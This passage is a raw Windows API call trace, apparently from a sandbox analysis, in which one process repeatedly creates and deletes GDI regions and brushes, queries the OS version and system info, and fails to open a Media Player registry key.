DeleteObject (ho=0x110109a) returned 1 [0088.224] DeleteObject (ho=0xaa0401d0) returned 1 [0088.224] DeleteObject (ho=0xac0401cd) returned 1 [0088.224] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.224] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.224] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.224] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.224] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.224] BeginPath (hdc=0x0) returned 0 [0088.224] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.224] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.224] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.224] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.224] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.224] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.225] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.225] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.225] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401d0 [0088.225] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401cd [0088.225] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104109b [0088.225] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104109c [0088.225] CombineRgn (hrgnDst=0x104109b, hrgnSrc1=0xab0401d0, hrgnSrc2=0xad0401cd, iMode=1) returned 1 [0088.225] CombineRgn (hrgnDst=0x104109c, hrgnSrc1=0xab0401d0, hrgnSrc2=0xad0401cd, iMode=4) returned 2 [0088.225] CreateSolidBrush (color=0xff) returned 0x210109a [0088.225] CreateSolidBrush (color=0xff0000) returned 0x110109d [0088.225] DeleteObject (ho=0x110109d) returned 1 [0088.225] DeleteObject (ho=0xad0401cd) returned 1 [0088.225] DeleteObject (ho=0xab0401d0) returned 1 [0088.225] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.225] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.225] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.225] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.225] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.225] BeginPath (hdc=0x0) returned 0 [0088.225] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.225] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.225] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.225] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.225] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.225] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.225] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.225] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.225] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401cd [0088.225] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401d0 [0088.225] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104109e [0088.225] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104109f [0088.225] CombineRgn (hrgnDst=0x104109e, hrgnSrc1=0xae0401cd, hrgnSrc2=0xac0401d0, iMode=1) returned 1 [0088.225] CombineRgn (hrgnDst=0x104109f, hrgnSrc1=0xae0401cd, hrgnSrc2=0xac0401d0, iMode=4) returned 2 [0088.225] CreateSolidBrush (color=0xff) returned 0x210109d [0088.225] CreateSolidBrush (color=0xff0000) returned 0x11010a0 [0088.225] DeleteObject (ho=0x11010a0) returned 1 [0088.225] DeleteObject (ho=0xac0401d0) returned 1 [0088.226] DeleteObject (ho=0xae0401cd) returned 1 [0088.226] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.226] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.226] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.226] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.226] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.226] BeginPath (hdc=0x0) returned 0 [0088.226] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.226] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.226] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.226] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.226] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.226] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.226] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.226] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.226] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401d0 [0088.226] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401cd [0088.226] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410a1 [0088.226] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410a2 [0088.226] CombineRgn (hrgnDst=0x10410a1, hrgnSrc1=0xad0401d0, hrgnSrc2=0xaf0401cd, iMode=1) returned 1 [0088.226] CombineRgn (hrgnDst=0x10410a2, hrgnSrc1=0xad0401d0, hrgnSrc2=0xaf0401cd, iMode=4) returned 2 [0088.226] CreateSolidBrush (color=0xff) returned 0x21010a0 [0088.226] CreateSolidBrush (color=0xff0000) returned 0x11010a3 [0088.226] DeleteObject (ho=0x11010a3) returned 1 [0088.226] DeleteObject (ho=0xaf0401cd) returned 1 [0088.226] DeleteObject (ho=0xad0401d0) returned 1 [0088.226] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.226] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.226] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.226] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.226] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.226] BeginPath (hdc=0x0) returned 0 [0088.226] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.226] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.226] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.226] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.226] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.226] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.226] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.227] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.227] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401cd [0088.227] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401d0 [0088.227] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410a4 [0088.227] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410a5 [0088.227] CombineRgn (hrgnDst=0x10410a4, hrgnSrc1=0xb00401cd, hrgnSrc2=0xae0401d0, iMode=1) returned 1 [0088.227] CombineRgn (hrgnDst=0x10410a5, hrgnSrc1=0xb00401cd, hrgnSrc2=0xae0401d0, iMode=4) returned 2 [0088.227] CreateSolidBrush (color=0xff) returned 0x21010a3 [0088.227] CreateSolidBrush (color=0xff0000) returned 0x11010a6 [0088.227] DeleteObject (ho=0x11010a6) returned 1 [0088.227] DeleteObject (ho=0xae0401d0) returned 1 [0088.227] DeleteObject (ho=0xb00401cd) returned 1 [0088.227] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.227] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.227] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.227] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.227] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.227] BeginPath (hdc=0x0) returned 0 [0088.227] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.227] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.227] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.227] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.227] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.227] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.227] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.227] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.227] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401d0 [0088.227] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401cd [0088.227] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410a7 [0088.227] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410a8 [0088.228] CombineRgn (hrgnDst=0x10410a7, hrgnSrc1=0xaf0401d0, hrgnSrc2=0xb10401cd, iMode=1) returned 1 [0088.228] CombineRgn (hrgnDst=0x10410a8, hrgnSrc1=0xaf0401d0, hrgnSrc2=0xb10401cd, iMode=4) returned 2 [0088.228] CreateSolidBrush (color=0xff) returned 0x21010a6 [0088.228] CreateSolidBrush (color=0xff0000) returned 0x11010a9 [0088.228] DeleteObject (ho=0x11010a9) returned 1 [0088.228] DeleteObject (ho=0xb10401cd) returned 1 [0088.228] DeleteObject (ho=0xaf0401d0) returned 1 [0088.228] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.228] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.228] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.228] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.228] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.228] BeginPath (hdc=0x0) returned 0 [0088.228] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.228] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.228] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.228] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.228] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.228] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.228] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.228] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.228] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401cd [0088.228] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401d0 [0088.228] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410aa [0088.228] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ab [0088.228] CombineRgn (hrgnDst=0x10410aa, hrgnSrc1=0xb20401cd, hrgnSrc2=0xb00401d0, iMode=1) returned 1 [0088.228] CombineRgn (hrgnDst=0x10410ab, hrgnSrc1=0xb20401cd, hrgnSrc2=0xb00401d0, iMode=4) returned 2 [0088.228] CreateSolidBrush (color=0xff) returned 0x21010a9 [0088.228] CreateSolidBrush (color=0xff0000) returned 0x11010ac [0088.228] DeleteObject (ho=0x11010ac) returned 1 [0088.228] DeleteObject (ho=0xb00401d0) returned 1 [0088.228] DeleteObject (ho=0xb20401cd) returned 1 [0088.229] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.229] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.229] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.229] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.229] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.229] BeginPath (hdc=0x0) returned 0 [0088.229] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.229] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.229] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.229] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.229] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.229] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.229] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.229] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.229] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401d0 [0088.229] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401cd [0088.229] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ad [0088.229] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ae [0088.229] CombineRgn (hrgnDst=0x10410ad, hrgnSrc1=0xb10401d0, hrgnSrc2=0xb30401cd, iMode=1) returned 1 [0088.229] CombineRgn (hrgnDst=0x10410ae, hrgnSrc1=0xb10401d0, hrgnSrc2=0xb30401cd, iMode=4) returned 2 [0088.229] CreateSolidBrush (color=0xff) returned 0x21010ac [0088.229] CreateSolidBrush (color=0xff0000) returned 0x11010af [0088.229] DeleteObject (ho=0x11010af) returned 1 [0088.229] DeleteObject (ho=0xb30401cd) returned 1 [0088.229] DeleteObject (ho=0xb10401d0) returned 1 [0088.229] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.229] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.229] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.229] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.229] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.229] BeginPath (hdc=0x0) returned 0 [0088.230] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.230] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.230] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.230] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.230] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.230] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.230] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.230] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.230] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401cd [0088.230] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401d0 [0088.230] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b0 [0088.230] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b1 [0088.230] CombineRgn (hrgnDst=0x10410b0, hrgnSrc1=0xb40401cd, hrgnSrc2=0xb20401d0, iMode=1) returned 1 [0088.230] CombineRgn (hrgnDst=0x10410b1, hrgnSrc1=0xb40401cd, hrgnSrc2=0xb20401d0, iMode=4) returned 2 [0088.230] CreateSolidBrush (color=0xff) returned 0x21010af [0088.230] CreateSolidBrush (color=0xff0000) returned 0x11010b2 [0088.230] DeleteObject (ho=0x11010b2) returned 1 [0088.230] DeleteObject (ho=0xb20401d0) returned 1 [0088.230] DeleteObject (ho=0xb40401cd) returned 1 [0088.230] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.230] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.230] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.230] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.230] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.230] BeginPath (hdc=0x0) returned 0 [0088.230] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.230] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.230] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.230] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.230] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.230] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.231] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.231] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.231] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401d0 [0088.231] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401cd [0088.231] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b3 [0088.231] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b4 [0088.231] CombineRgn (hrgnDst=0x10410b3, hrgnSrc1=0xb30401d0, hrgnSrc2=0xb50401cd, iMode=1) returned 1 [0088.231] CombineRgn (hrgnDst=0x10410b4, hrgnSrc1=0xb30401d0, hrgnSrc2=0xb50401cd, iMode=4) returned 2 [0088.231] CreateSolidBrush (color=0xff) returned 0x21010b2 [0088.231] CreateSolidBrush (color=0xff0000) returned 0x11010b5 [0088.231] DeleteObject (ho=0x11010b5) returned 1 [0088.231] DeleteObject (ho=0xb50401cd) returned 1 [0088.231] DeleteObject (ho=0xb30401d0) returned 1 [0088.231] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.231] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.231] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: 